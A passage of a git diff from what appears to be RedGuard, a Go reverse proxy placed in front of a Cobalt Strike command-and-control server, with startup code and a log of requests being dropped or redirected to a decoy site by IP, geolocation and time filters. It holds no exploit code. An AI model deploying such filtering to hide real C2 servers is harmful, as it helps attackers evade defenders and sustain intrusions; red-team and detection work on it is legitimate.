file object + num int // counting variable + ) + // HTTPS Reverse proxy SSL certificate is created + lib.InitGenerateSelfSignedCert() + for key, value := range map[string]string{ + "HTTPS": "/", + "HTTP": "/http", + } { + proxy.Action = key // Gets the reverse proxy listening port type + proxy.Pattern = value // Gets the pattern associated with the listening type + proxy.Port = lib.ReadConfig("proxy", fmt.Sprintf("Port_%s", key), cfg) + // When num is greater than 0, the main program is called out of the loop + if num > 0 { + break + } + num += 1 + logger.Noticef("HostTarget: %s", lib.ReadConfig("proxy", "HostTarget", cfg)) + // HTTP reverse proxy + go core.ProxyManger(proxy.Action, proxy.Port, proxy.Pattern) + } + // HTTPS reverse proxy + core.ProxyManger(proxy.Action, proxy.Port, proxy.Pattern) + // TODO CobaltStrike Core flow control method +} + +func (c2 C2) configInit(args *parameter.Parses) { + c2.Type = args.C2Type + // Check C2 Server type + switch strings.ToLower(c2.Type) { + case "cobaltstrike": + // CobaltStrike Server initialize method + (&cobaltStrike{}).serverInit() + } + // TODO:Development Pending for other C2 frameworks +} + +func main() { + fmt.Println(fmt.Sprintf(config.BANNER, config.VERSION, config.URL)) // output banner information. + // Create the tool argument + var ( + parse parameter.Parses // Basic parameter structure + cert parameter.Cert // Certificate configuration parameter structure + _proxy parameter.Proxy // Proxy configuration parameter structure + ) + core.CmdParse(&parse, &cert, &_proxy) + // Check whether RedGuard has been initialized + if num, isExits := lib.CreateConfig(parse.C2Type /* C2 Facility Type */, parse.ConfigPath); isExits { + switch { + case parse.Update: + lib.UpdateConfig(&cert, &_proxy) // Update RedGuard Config + logger.Notice("RedGuard Configuration file updated successfully!") + case parse.IP != "": + if lib.CheckIP(parse.IP) == false { + logger.Warning("Please enter a valid IP address") + os.Exit(0) + } + logger.Noticef("Search ipLookUpHelper: %s", parse.IP) + core.IPLookUp(parse.Location /* owning place to be verified */, parse.IP) // Query the location of an IP address + case num == 0: + // Select different C2 Server modes based on user parameters,default CobaltStrike. + (C2{}).configInit(&parse) + case num == 1: // Initialization is run for the first time + os.Exit(0) + } + } +} diff --git a/RedGuard.log b/RedGuard.log index 8c3a410..b7c1b35 100644 --- a/RedGuard.log +++ b/RedGuard.log @@ -1,541 +1,541 @@ -[2022-05-23 10:34:36] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-23 10:34:36] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -[2022-05-23 10:34:36] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-23 10:34:36] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-23 10:34:57] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:34:57] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 111.14.218.206 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.53 -[2022-05-23 10:34:57] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net -[2022-05-23 10:35:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:35:52] [RedGuard/core.IPLookUp] { - "status": "0", - "t": "", - "set_cache_time": "", - "data": [ - { - "ExtendedLocation": "", - "OriginQuery": "111.14.218.206", - "appinfo": "", - "disp_type": 0, - "fetchkey": "111.14.218.206", - "location": "山东省济南市 移动", - "origip": "111.14.218.206", - "origipquery": "111.14.218.206", - "resourceid": "6006", - "role_id": 0, - "shareImage": 1, - "showLikeShare": 1, - "showlamp": "1", - "titlecont": "IP地址查询", - "tplt": "ip" - } - ] -} -[2022-05-23 10:35:52] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 Does not meet the allowed online geographical restrictions -[2022-05-23 10:35:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net -[2022-05-23 10:36:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:36:36] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 request online IP address is not whitelisted -[2022-05-23 10:36:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net -[2022-05-23 10:37:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:37:14] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 Requests are made during prohibited periods of time -[2022-05-23 10:37:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net -[2022-05-23 10:37:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 10:37:36] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 Requests are made during prohibited periods of time -[2022-05-23 10:37:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net -[2022-05-23 10:39:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - -[2022-05-23 10:39:05] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 -[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - -[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 -[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 -[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 -[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 -[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 -[2022-05-23 10:39:16] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:16] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.0 Safari/537.36 -[2022-05-23 10:39:16] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 -[2022-05-23 10:39:50] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:50] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - -[2022-05-23 10:39:50] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 -[2022-05-23 10:39:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - -[2022-05-23 10:39:58] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 -[2022-05-23 10:39:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:39:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 -[2022-05-23 10:39:59] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 -[2022-05-23 10:40:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:40:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 -[2022-05-23 10:40:00] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 -[2022-05-23 10:40:07] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-23 10:40:07] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0 -[2022-05-23 10:40:07] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 -[2022-05-23 10:47:30] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-23 10:47:30] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -[2022-05-23 10:47:30] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-23 10:47:30] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-23 10:48:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 10:48:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-23 10:50:03] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-23 10:50:03] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -[2022-05-23 10:50:03] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-23 10:50:03] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-23 10:50:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 10:50:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-23 10:50:17] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-23 10:50:39] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-23 10:50:39] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -[2022-05-23 10:50:39] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-23 10:50:39] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-23 10:50:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 10:50:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-23 10:50:47] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-23 10:51:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 10:51:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-23 10:51:36] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-23 10:51:41] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-23 10:51:41] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -[2022-05-23 10:51:41] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-23 10:51:41] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-23 10:51:42] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 10:51:42] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-23 10:51:42] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-23 11:03:06] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-23 11:03:06] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -[2022-05-23 11:03:06] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-23 11:03:06] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-23 11:03:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 11:03:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-23 11:03:08] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-23 11:03:26] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-23 11:03:26] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -[2022-05-23 11:03:26] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-23 11:03:26] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-23 11:03:27] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-23 11:03:27] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 16:12:02] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:12:02] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:12:02] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:12:02] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:12:17] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:12:18] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:38:48] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:38:48] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:38:48] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:38:48] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:38:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:38:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:38:58] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:38:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:38:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:38:59] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:39:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:39:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:39:04] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:39:52] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:39:52] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:39:52] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:39:52] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:40:01] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:40:01] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:40:01] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 16:40:53] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:40:53] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:40:53] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:40:53] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:41:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:41:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:41:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 16:47:03] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:47:03] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:47:03] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:47:03] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:47:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:47:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:47:13] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:47:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:47:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:47:14] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:47:26] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:47:26] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:47:26] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:47:26] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:47:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:47:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:47:32] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:47:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:47:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:47:34] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:50:09] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:50:09] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:50:09] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:50:09] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:50:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:50:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:50:29] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:50:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:50:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:50:31] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:52:41] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:52:41] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:52:41] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:52:41] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:52:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:52:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:52:47] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:52:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:52:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:52:48] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:53:14] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 16:53:14] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 16:53:14] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 16:53:14] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 16:53:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:53:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:53:19] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:53:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:53:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:53:20] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 16:53:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 16:53:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 16:53:25] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:08:31] [RedGuard/lib.InitConfig] Fail to read file: open : The system cannot find the file specified. -[2022-05-30 17:10:48] [RedGuard/lib.InitConfig] Fail to read file: open : The system cannot find the file specified. -[2022-05-30 17:10:48] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:10:48] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:10:48] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:10:48] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:12:55] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:12:55] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:12:55] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:12:55] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:13:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:13:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:13:19] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:13:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:13:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:13:20] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:15:58] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:15:58] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 